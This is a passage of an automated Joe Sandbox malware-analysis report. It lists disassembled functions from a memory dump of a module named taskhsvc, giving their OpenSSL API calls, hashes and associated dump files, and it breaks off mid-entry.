                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Key_itN1_i2d_bioN1_item_i2dN1_item_i2d_bioO_freeO_writePublic__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 3426478733-0
                                                            • Opcode ID: e38008620d3f4e0df4c24873dd4b7762b9ca75c681171dc568b7c1e63fecf0d5
                                                            • Instruction ID: 2e68f7d69e142ffb0282bc8cfb231f845ea5006cfebb0909cb453875e83635da
                                                            • Opcode Fuzzy Hash: e38008620d3f4e0df4c24873dd4b7762b9ca75c681171dc568b7c1e63fecf0d5
                                                            • Instruction Fuzzy Hash: 61E1C4759097019FCB40DF39C68165BBBF1BB89304F92991DE5A88B704E331AA498F87
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF58EF0 Relevance: 51.0, APIs: 28, Strings: 1, Instructions: 282COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock
                                                            • String ID: A
                                                            • API String ID: 1396966674-3554254475
                                                            • Opcode ID: b2a954983874f485638b4dd9c5bff437ff397cd35000875a11b9f93b71e427d1
                                                            • Instruction ID: 008a5f1a8d852ca22317131e0cf63f7d1f97501546f1a06d54499b992d6c923b
                                                            • Opcode Fuzzy Hash: b2a954983874f485638b4dd9c5bff437ff397cd35000875a11b9f93b71e427d1
                                                            • Instruction Fuzzy Hash: A1C106B16197019FDB10DF39C28074BBBF1AB99308F42991DEAA88B700D731E955CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEDCD10 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 342COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EVP_MD_CTX_clear_flags.LIBEAY32 ref: 6CEDCD53
                                                            • ENGINE_get_digest_engine.LIBEAY32 ref: 6CEDCD8C
                                                            • ENGINE_get_digest.LIBEAY32 ref: 6CEDCDA4
                                                            • CRYPTO_free.LIBEAY32 ref: 6CEDCED6
                                                            • ERR_put_error.LIBEAY32 ref: 6CEDCFB7
                                                            • ENGINE_finish.LIBEAY32 ref: 6CEDCD82
                                                              • Part of subcall function 6CEBD660: CRYPTO_lock.LIBEAY32(?,?,?,?,?,?,?,?,?,00000000,?,6CE9E7FF), ref: 6CEBD69B
                                                            • EVP_PKEY_CTX_ctrl.LIBEAY32 ref: 6CEDCE5E
                                                            • ERR_put_error.LIBEAY32 ref: 6CEDCF1F
                                                            • ENGINE_finish.LIBEAY32 ref: 6CEDCFBF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_finishR_put_error$E_get_digestE_get_digest_engineO_freeO_lockX_clear_flagsX_ctrl
                                                            • String ID: A
                                                            • API String ID: 2304701372-3554254475
                                                            • Opcode ID: 397ec38f9f0a19682e08dc4f338f0e8cbd08d2b957ffefb53b95e5477d797e51
                                                            • Instruction ID: 86f3b51c46cada453bc0246dfa7cc0474a663683735c1302c4fc4424130b2d13
                                                            • Opcode Fuzzy Hash: 397ec38f9f0a19682e08dc4f338f0e8cbd08d2b957ffefb53b95e5477d797e51
                                                            • Instruction Fuzzy Hash: 08E126B56097028BD700DF29C58035BBBF1BF8539CF22891CE8988BB44D775E5468F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF4C880 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$F_strdupR_put_error$O_mallocsk_push
                                                            • String ID: A$f$i
                                                            • API String ID: 538425094-87896389
                                                            • Opcode ID: 7a9c8ba8d722af5d66d439dfb56055cbf8b0d65237c103b1afb8f154cb160abe
                                                            • Instruction ID: b62314890443f330f147354300599f723debfe66703565783f44e4e2286ff5dc
                                                            • Opcode Fuzzy Hash: 7a9c8ba8d722af5d66d439dfb56055cbf8b0d65237c103b1afb8f154cb160abe
                                                            • Instruction Fuzzy Hash: BF918EB12087019BD700AF66C54035BBFF4EF84788F11D91DE9D88BB41EB7AD4498B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF2EFC0 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 228COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PEM_bytes_read_bio.LIBEAY32 ref: 6CF2F03B
                                                              • Part of subcall function 6CF2BB70: PEM_read_bio.LIBEAY32 ref: 6CF2BC13
                                                            • d2i_X509_SIG.LIBEAY32 ref: 6CF2F093
                                                              • Part of subcall function 6CF062A0: ASN1_item_d2i.LIBEAY32 ref: 6CF062CD
                                                            • PKCS8_decrypt.LIBEAY32 ref: 6CF2F0DA
                                                              • Part of subcall function 6CF6F880: PKCS8_PRIV_KEY_INFO_it.LIBEAY32 ref: 6CF6F8A1
                                                              • Part of subcall function 6CF6F880: PKCS12_item_decrypt_d2i.LIBEAY32 ref: 6CF6F8C3
                                                            • ERR_put_error.LIBEAY32 ref: 6CF2F147
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF2F155
                                                            • OPENSSL_cleanse.LIBEAY32 ref: 6CF2F169
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF2F175
                                                            • EVP_PKEY_asn1_find_str.LIBEAY32 ref: 6CF2F1CB
                                                            • d2i_PrivateKey.LIBEAY32 ref: 6CF2F200
                                                            • d2i_PKCS8_PRIV_KEY_INFO.LIBEAY32 ref: 6CF2F227
                                                            • EVP_PKCS82PKEY.LIBEAY32 ref: 6CF2F239
                                                            • EVP_PKEY_free.LIBEAY32 ref: 6CF2F251
                                                            • PKCS8_PRIV_KEY_INFO_free.LIBEAY32 ref: 6CF2F25F
                                                            • ERR_put_error.LIBEAY32 ref: 6CF2F297
                                                            • X509_SIG_free.LIBEAY32 ref: 6CF2F29F
                                                            • PEM_def_callback.LIBEAY32 ref: 6CF2F2C0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freed2i_$R_put_errorX509_$G_freeL_cleanseM_bytes_read_bioM_def_callbackM_read_bioN1_item_d2iO_itPrivateS12_item_decrypt_d2iS8_decryptY_asn1_find_strY_free
                                                            • String ID: ENCRYPTED PRIVATE KEY$P$PRIVATE KEY$h$u
                                                            • API String ID: 275417579-1157398782
                                                            • Opcode ID: f243da9bfc3322ec75bdf0a2dd21a613652b886c920c0cc500f8d70dc83d2da1
                                                            • Instruction ID: cea0e354f722d1cac56beef5090f18b1f8e72fcc80cf622eabf24ca271306866
                                                            • Opcode Fuzzy Hash: f243da9bfc3322ec75bdf0a2dd21a613652b886c920c0cc500f8d70dc83d2da1
                                                            • Instruction Fuzzy Hash: 39A1FEB5A193019FD750DFA9C18064BFBF0AF89744F11892EE99887710E739E8488B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF74CC0 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 173COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • X509_check_private_key.LIBEAY32 ref: 6CF74D08
                                                              • Part of subcall function 6CF35790: X509_PUBKEY_get.LIBEAY32 ref: 6CF357C1
                                                              • Part of subcall function 6CF35790: EVP_PKEY_cmp.LIBEAY32 ref: 6CF357D7
                                                              • Part of subcall function 6CF35790: EVP_PKEY_free.LIBEAY32 ref: 6CF357FF
                                                            • EVP_sha1.LIBEAY32 ref: 6CF74D2F
                                                            • X509_pubkey_digest.LIBEAY32 ref: 6CF74D4F
                                                              • Part of subcall function 6CF434C0: X509_get0_pubkey_bitstr.LIBEAY32 ref: 6CF434E4
                                                              • Part of subcall function 6CF434C0: EVP_Digest.LIBEAY32 ref: 6CF4350D
                                                            • ASN1_OCTET_STRING_new.LIBEAY32 ref: 6CF74D54
                                                              • Part of subcall function 6CF16DE0: ASN1_item_new.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CE3F4F3), ref: 6CF16DF5
                                                            • ASN1_OCTET_STRING_set.LIBEAY32 ref: 6CF74D73
                                                            • X509_get_subject_name.LIBEAY32 ref: 6CF74D97
                                                            • X509_NAME_set.LIBEAY32 ref: 6CF74DA6
                                                            • X509_gmtime_adj.LIBEAY32 ref: 6CF74DD3
                                                            • OCSP_RESPDATA_it.LIBEAY32 ref: 6CF74DE8
                                                            • ASN1_item_sign.LIBEAY32 ref: 6CF74E14
                                                            • sk_new_null.LIBEAY32 ref: 6CF74E37
                                                            • sk_push.LIBEAY32 ref: 6CF74E5B
                                                            • CRYPTO_add_lock.LIBEAY32 ref: 6CF74E92
                                                            • sk_num.LIBEAY32 ref: 6CF74ECF
                                                            • sk_value.LIBEAY32 ref: 6CF74EE3
                                                            • sk_push.LIBEAY32 ref: 6CF74EF8
                                                            • ERR_put_error.LIBEAY32 ref: 6CF74F4B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X509_sk_push$A_itDigestE_setG_newG_setN1_item_newN1_item_signO_add_lockP_sha1R_put_errorX509_check_private_keyX509_get0_pubkey_bitstrX509_get_subject_nameX509_gmtime_adjX509_pubkey_digestY_cmpY_freeY_getsk_new_nullsk_numsk_value
                                                            • String ID: (UNKNOWN)$h$n$revoked$unknown
                                                            • API String ID: 3913213466-2775805227
                                                            • Opcode ID: 081da779870d737aee9e9684193c5fea204913ecb510adfccffdfaa91476623a
                                                            • Instruction ID: 162cbb50b2e6a459b7237442412a17b6a30943803622bb8b584e7800f10e562b
                                                            • Opcode Fuzzy Hash: 081da779870d737aee9e9684193c5fea204913ecb510adfccffdfaa91476623a
                                                            • Instruction Fuzzy Hash: 9C61D0B05097018FD7119F25D28439ABBE0BF88318F11891EE9D897B50EB75E844CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEF44F0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 318COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: M_freeR_put_error
                                                            • String ID: r$v
                                                            • API String ID: 177401054-3770306691
                                                            • Opcode ID: 740f5ac988f84e595169faa2b94fe41cae34e12164b4c0d23ecd92815542bf57
